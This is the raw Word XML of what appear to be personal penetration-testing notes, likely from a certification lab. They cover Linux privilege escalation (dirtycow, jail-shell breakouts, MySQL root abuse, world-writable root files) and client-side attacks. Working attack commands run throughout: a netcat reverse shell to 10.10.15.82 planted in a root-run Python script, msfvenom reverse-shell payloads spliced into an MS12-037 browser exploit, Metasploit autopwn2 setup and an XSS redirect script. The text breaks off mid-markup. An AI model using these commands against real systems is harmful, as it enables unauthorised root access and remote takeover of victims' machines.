    <w:p w14:paraId="1A8D566F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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f you see linux version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; 2.6.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt; 3.9,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> chances are, it might be vulnerable to dirtycow. Best working exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r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www.exploit-db.com/exploits/40839</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B399A3F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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You might have to close and reopen shell to get it to work tho. Then you can su </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>firefart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDF2606" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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Limited shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2846E" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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Lshell: breakout by using </w:t>
      </w:r>
      <w:bookmarkStart w:id="19" w:name="OLE_LINK8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo &amp;&amp; bash </w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo || bash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(if bash doesnt work, try sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F380C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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Rbash: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r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speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5CDCB" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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</w:rPr>
        <w:t>SQL login with root and “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D2550" w14:textId="48D0DF6F" w:rsidR="007351F7" w:rsidRPr="00B82861" w:rsidRDefault="007351F7" w:rsidP="007351F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</w:rPr>
        <w:t xml:space="preserve">If you can login to the mysql database with root and empty password- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mysql -u root -p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
        </w:rPr>
        <w:t>then you can execute commands that run as root:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10188383" w14:textId="77777777" w:rsidR="00B82861" w:rsidRPr="007351F7" w:rsidRDefault="00B82861" w:rsidP="00B82861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Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A31E0CD" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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 w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Linux command for privilege escalate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A0B0A" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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 w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">updatedb </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D64E0F" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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 w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>then can use locate</w:t>
      </w:r>
      <w:r w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D5D9C" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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 w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>which sbd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39848FC7" w14:textId="44F2C2EA" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F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 w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>find / -name sbd*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302C6CCA" w14:textId="77777777" w:rsidR="00B82861" w:rsidRPr="007351F7" w:rsidRDefault="00B82861" w:rsidP="00B82861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Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D1536B" w14:textId="77E191E0" w:rsidR="008708EC" w:rsidRDefault="008708EC" w:rsidP="00B8286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Command are limited, break out of the “jail” shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFFDDF4" w14:textId="256B2F02" w:rsidR="00B82861" w:rsidRDefault="00B82861" w:rsidP="008708EC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bookmarkStart w:id="20" w:name="OLE_LINK5"/>
      <w:bookmarkStart w:id="21" w:name="OLE_LINK6"/>
      <w:r w:rsidRPr="008708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python -c 'import pty; pty.spawn("/bin/sh")'</w:t>
      </w:r>
      <w:r w:rsidR="008B37A8" w:rsidRPr="008708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidR="008B37A8" w:rsidRPr="008708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Elevate to bash TTY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF71F58" w14:textId="08FC65F4" w:rsidR="00480D1C" w:rsidRPr="008708EC" w:rsidRDefault="00B0172B" w:rsidP="008708EC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Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158A3B71" w14:textId="4E0E28EF" w:rsidR="008708EC" w:rsidRPr="008708EC" w:rsidRDefault="008708EC" w:rsidP="00B82861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8708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo os.system('/bin/bash')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332C8AB" w14:textId="3190A34D" w:rsidR="00B82861" w:rsidRPr="008708EC" w:rsidRDefault="008708EC" w:rsidP="00B82861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 w:rsidRPr="008708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/sh -i</w:t>
      </w:r>
      <w:r w:rsidR="00B82861" w:rsidRPr="008708EC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64AA17" w14:textId="77777777" w:rsidR="00B675BB" w:rsidRPr="00B82861" w:rsidRDefault="00B675BB" w:rsidP="00B675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</w:p>
    <w:p w14:paraId="1FC89849" w14:textId="77777777" w:rsidR="00587AFF" w:rsidRDefault="00587AFF" w:rsidP="00587AF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J</w:t>
      </w:r>
      <w:r w:rsidRPr="00587AFF">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ust look for files owned by root that we could write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA8F28" w14:textId="7204088A" w:rsidR="00587AFF" w:rsidRPr="00587AFF" w:rsidRDefault="00587AFF" w:rsidP="00587AFF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 w:rsidRPr="00587AFF">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="248F24"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>find / -user root -perm -002 -type f -not -path "/proc/*"  2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136AE3B8" w14:textId="2396B7B2" w:rsidR="00587AFF" w:rsidRDefault="00587AFF" w:rsidP="00587AFF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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54B4FFC9" wp14:editId="175B45F0">
            <wp:extent cx="4105656" cy="151593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185" cy="15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148" w14:textId="35A17792" w:rsidR="00587AFF" w:rsidRPr="00587AFF" w:rsidRDefault="00587AFF" w:rsidP="00587AFF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Style w:val="hljs-builtin"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="F8F8F8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="23241F"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FF9999"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="F8F8F8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="23241F"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; tmp.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74F0F0" w14:textId="3496AF03" w:rsidR="00587AFF" w:rsidRDefault="00587AFF" w:rsidP="00587AFF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C4C9FA" wp14:editId="00C4B293">
            <wp:extent cx="4489704" cy="187646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431" cy="18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B9DC" w14:textId="77777777" w:rsidR="00351618" w:rsidRDefault="00351618" w:rsidP="00B675B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5F55516" w14:textId="1C2A3F31" w:rsidR="007407DB" w:rsidRPr="00B971AC" w:rsidRDefault="007407DB" w:rsidP="00B971AC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</w:p>
    <w:p w14:paraId="61ABDFBA" w14:textId="19B2BC7D" w:rsidR="007407DB" w:rsidRDefault="007407DB" w:rsidP="007407D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</w:p>
    <w:p w14:paraId="78F5B9AF" w14:textId="77777777" w:rsidR="007407DB" w:rsidRDefault="007407DB" w:rsidP="007407D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</w:p>
    <w:p w14:paraId="7FC54BF7" w14:textId="182A4E51" w:rsidR="007407DB" w:rsidRDefault="00153C8D" w:rsidP="007407D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PHPLiteAdmin 1.9.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F5D1F" w14:textId="7C69A23A" w:rsidR="00153C8D" w:rsidRDefault="00153C8D" w:rsidP="00153C8D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&lt;?php function di($u, $o){$c = file_get_contents($u);file_put_contents($o,$c);}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044E9559" w14:textId="77777777" w:rsidR="00741D1A" w:rsidRPr="00153C8D" w:rsidRDefault="00741D1A" w:rsidP="00741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Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ADB0F0" w14:textId="0143E51F" w:rsidR="00741D1A" w:rsidRDefault="00C96FFD" w:rsidP="00741D1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If root owned a python script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2421E746" w14:textId="75A0DB10" w:rsidR="00C96FFD" w:rsidRPr="00C96FFD" w:rsidRDefault="00C96FFD" w:rsidP="00C96FFD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 w:rsidRPr="00C96FFD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Touch test to test the folder/file is being run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> so will run at some point of time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640EBA51" w14:textId="43B23335" w:rsidR="00C96FFD" w:rsidRDefault="00C96FFD" w:rsidP="00C96FFD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 w:rsidRPr="00C96FFD">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo "os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')" &gt;&gt; tmp.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26635CBC" w14:textId="1A6D2F3B" w:rsidR="00C96FFD" w:rsidRPr="00C96FFD" w:rsidRDefault="00C96FFD" w:rsidP="00C96FFD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now wait for a shell for nc -nvlp 8001 for privilege escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3841BAB4" w14:textId="4E0D3A0E" w:rsidR="003E6157" w:rsidRDefault="003E6157" w:rsidP="00B675B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79483D" w14:textId="77777777" w:rsidR="003E6157" w:rsidRDefault="003E6157" w:rsidP="003E615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Find the PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCDED42" w14:textId="77777777" w:rsidR="003E6157" w:rsidRDefault="003E6157" w:rsidP="00B675BB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 w:rsidRPr="003E6157">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>cat /proc/net/netlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4CFBE" w14:textId="379720B1" w:rsidR="007351F7" w:rsidRPr="003E6157" w:rsidRDefault="003E6157" w:rsidP="00B675BB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Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E6157">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ps aux|grep udev</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6157">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="007351F7">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B02948D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc533025671"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CLIENT SIDE ATTACKS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6D09A79B" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="00D929F0">
      <w:bookmarkStart w:id="23" w:name="_szho0s4675ew" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="266FE2F7" w14:textId="7BB38AFF" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MS12-037</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81F48D" w14:textId="27337A89" w:rsidR="00DA1A96" w:rsidRDefault="00883142" w:rsidP="00DA1A96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Is in bind shell</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A96">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> code on port 444</w:t>
      </w:r>
      <w:r w:rsidR="004D384F">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> put to my /var/www</w:t>
      </w:r>
      <w:r w:rsidR="00DA1A96">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, then can modify it to make a reverse shell code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54D61A" w14:textId="78A1DDFB" w:rsidR="00DA1A96" w:rsidRDefault="00DA1A96" w:rsidP="00C01F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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 w:rsidRPr="00C01F9E">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.55 LPORT=443 -f js_le -e generic/none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CDDCDE" w14:textId="3619841E" w:rsidR="004A169C" w:rsidRPr="00C01F9E" w:rsidRDefault="004A169C" w:rsidP="00C01F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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bookmarkStart w:id="24" w:name="_Hlk532176304"/>
      <w:r w:rsidRPr="004E30CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.</w:t>
      </w:r>
      <w:r w:rsidR="00FE48FE" w:rsidRPr="004E30CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r w:rsidRPr="004E30CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=443 -f js_le --platform windows -a x86 -e generic/none</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidR="00633F3B" w:rsidRPr="004E30CC">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Use this for the reverse shell payload!!!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7254AC23" w14:textId="1CC8862E" w:rsidR="00C01F9E" w:rsidRDefault="00C01F9E" w:rsidP="00C01F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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 w:rsidRPr="00C01F9E">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>size 324 which is 18 byte smaller then the payload for ms12-037 which is 342 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00DC15F5">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Then copy over the payload to the MS12-037 html file. Replace the shellcode part.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC5147" w14:textId="379DCBC2" w:rsidR="00DC15F5" w:rsidRDefault="00DC15F5" w:rsidP="00C01F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D66B29A" wp14:editId="18921953">
            <wp:extent cx="4405631" cy="21039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3767" cy="21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955" w14:textId="12BB009C" w:rsidR="00FC49A3" w:rsidRPr="00C01F9E" w:rsidRDefault="00FC49A3" w:rsidP="00C01F9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Must pad the end of the payload from the msfvenom with 18 NOPS commends (%u9090)</w:t>
      </w:r>
      <w:r w:rsidR="00891DC4">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> x18 times. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D62E8BC" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Metasploit browser autopwn2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46874751" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Lets you run a server that hosts different attack payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7D228" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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et SRVHOST=&lt;your IP&gt;, SRVPORT=80 (remember to stop apache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6194D" w14:textId="182E5EAE" w:rsidR="007351F7" w:rsidRPr="007D4B24" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Embed the url of the server in a page vulnerable to XSS: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt; window.location.href=</w:t>
      </w:r>
      <w:r w:rsidR="00500DA2">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
